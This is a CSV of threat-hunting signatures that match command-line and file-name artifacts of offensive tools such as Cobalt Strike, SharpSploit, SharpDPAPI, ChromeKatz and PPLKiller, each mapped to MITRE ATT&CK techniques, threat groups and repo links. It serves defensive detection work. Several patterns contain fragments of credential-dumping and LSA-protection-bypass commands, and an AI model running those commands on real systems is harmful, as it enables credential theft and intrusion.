"*.com/dcsync/*",".{0,1000}\.com\/dcsync\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","4274"
"*.Credentials.Mimikatz.*",".{0,1000}\.Credentials\.Mimikatz\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4280"
"*.Credentials.Tokens.BypassUAC*",".{0,1000}\.Credentials\.Tokens\.BypassUAC.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4281"
"*.DCSync(System.String*",".{0,1000}\.DCSync\(System\.String.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4283"
"*.dev.123456.*",".{0,1000}\.dev\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4284"
"*.DLL injection complete!*",".{0,1000}\.DLL\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","4286"
"*.dmp 1> \\127.0.0.1\C$\*",".{0,1000}\.dmp\s1\>\s\\\\127\.0\.0\.1\\C\$\\.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","4287"
"*.dns2tcpdrc*",".{0,1000}\.dns2tcpdrc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","4288"
"*.doc.bat*",".{0,1000}\.doc\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4290"
"*.doc.dll*",".{0,1000}\.doc\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4291"
"*.doc.exe*",".{0,1000}\.doc\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4292"
"*.doc.htm*",".{0,1000}\.doc\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4293"
"*.doc.iso*",".{0,1000}\.doc\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4294"
"*.doc.jar*",".{0,1000}\.doc\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4295"
"*.doc.js*",".{0,1000}\.doc\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4296"
"*.doc.sfx*",".{0,1000}\.doc\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4297"
"*.doc.vbs*",".{0,1000}\.doc\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4298"
"*.docx.bat*",".{0,1000}\.docx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4299"
"*.docx.exe*",".{0,1000}\.docx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4300"
"*.docx.htm*",".{0,1000}\.docx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4301"
"*.docx.iso*",".{0,1000}\.docx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4302"
"*.docx.jar*",".{0,1000}\.docx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4303"
"*.docx.jasmin*",".{0,1000}\.docx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4304"
"*.docx.js*",".{0,1000}\.docx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4305"
"*.docx.sfx*",".{0,1000}\.docx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4306"
"*.docx.vbs*",".{0,1000}\.docx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4307"
"*.edx765txt*",".{0,1000}\.edx765txt.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4308"
"*.Enumeration.Domain.Credential*",".{0,1000}\.Enumeration\.Domain\.Credential.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4309"
"*.Enumeration.Domain.SPNTicket*",".{0,1000}\.Enumeration\.Domain\.SPNTicket.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4310"
"*.Enumeration.Keylogger*",".{0,1000}\.Enumeration\.Keylogger.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4311"
"*.Enumeration.Keylogger.*",".{0,1000}\.Enumeration\.Keylogger\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4312"
"*.Enumeration.Network.PortScanResult*",".{0,1000}\.Enumeration\.Network\.PortScanResult.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4313"
"*.Enumeration.Registry.GetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.GetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4314"
"*.Enumeration.Registry.SetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.SetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4315"
"*.events.123456.*",".{0,1000}\.events\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4316"
"*.exe  /HistorySource 1 /SaveDirect /scomma *",".{0,1000}\.exe\s\s\/HistorySource\s1\s\/SaveDirect\s\/scomma\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4317"
"*.exe  /logonpasswords /symbol*",".{0,1000}\.exe\s\s\/logonpasswords\s\/symbol.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","4318"
"*.exe  --b64 --path * --args ",".{0,1000}\.exe\s\s\-\-b64\s\-\-path\s.{0,1000}\s\-\-args\s","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","4319"
"*.exe  --buildcache -c *\cache.txt*",".{0,1000}\.exe\s\s\-\-buildcache\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4320"
"*.exe  certificates /pvk:*.pvk*",".{0,1000}\.exe\s\scertificates\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4321"
"*.exe  -group=remote -computername=*",".{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4322"
"*.exe  keepass /unprotect*",".{0,1000}\.exe\s\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4323"
"*.exe  -lolbas log*",".{0,1000}\.exe\s\s\-lolbas\slog.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4324"
"*.exe * -eventlog *Key Management Service*",".{0,1000}\.exe\s.{0,1000}\s\-eventlog\s.{0,1000}Key\sManagement\sService.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","4326"
"*.exe * --source Persistence*",".{0,1000}\.exe\s.{0,1000}\s\-\-source\sPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","4327"
"*.exe *.bin -enc aes -lang csharp*",".{0,1000}\.exe\s.{0,1000}\.bin\s\-enc\saes\s\-lang\scsharp.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4328"
"*.exe *-searchforest*-pwdlastset*",".{0,1000}\.exe\s.{0,1000}\-searchforest.{0,1000}\-pwdlastset.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","N/A","2","121","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z","4329"
"*.exe .\chrome.DMP*",".{0,1000}\.exe\s\.\\chrome\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","4330"
"*.exe .\msedge.DMP*",".{0,1000}\.exe\s\.\\msedge\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","4331"
"*.exe /disableLSAProtection*",".{0,1000}\.exe\s\/disableLSAProtection.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","4332"
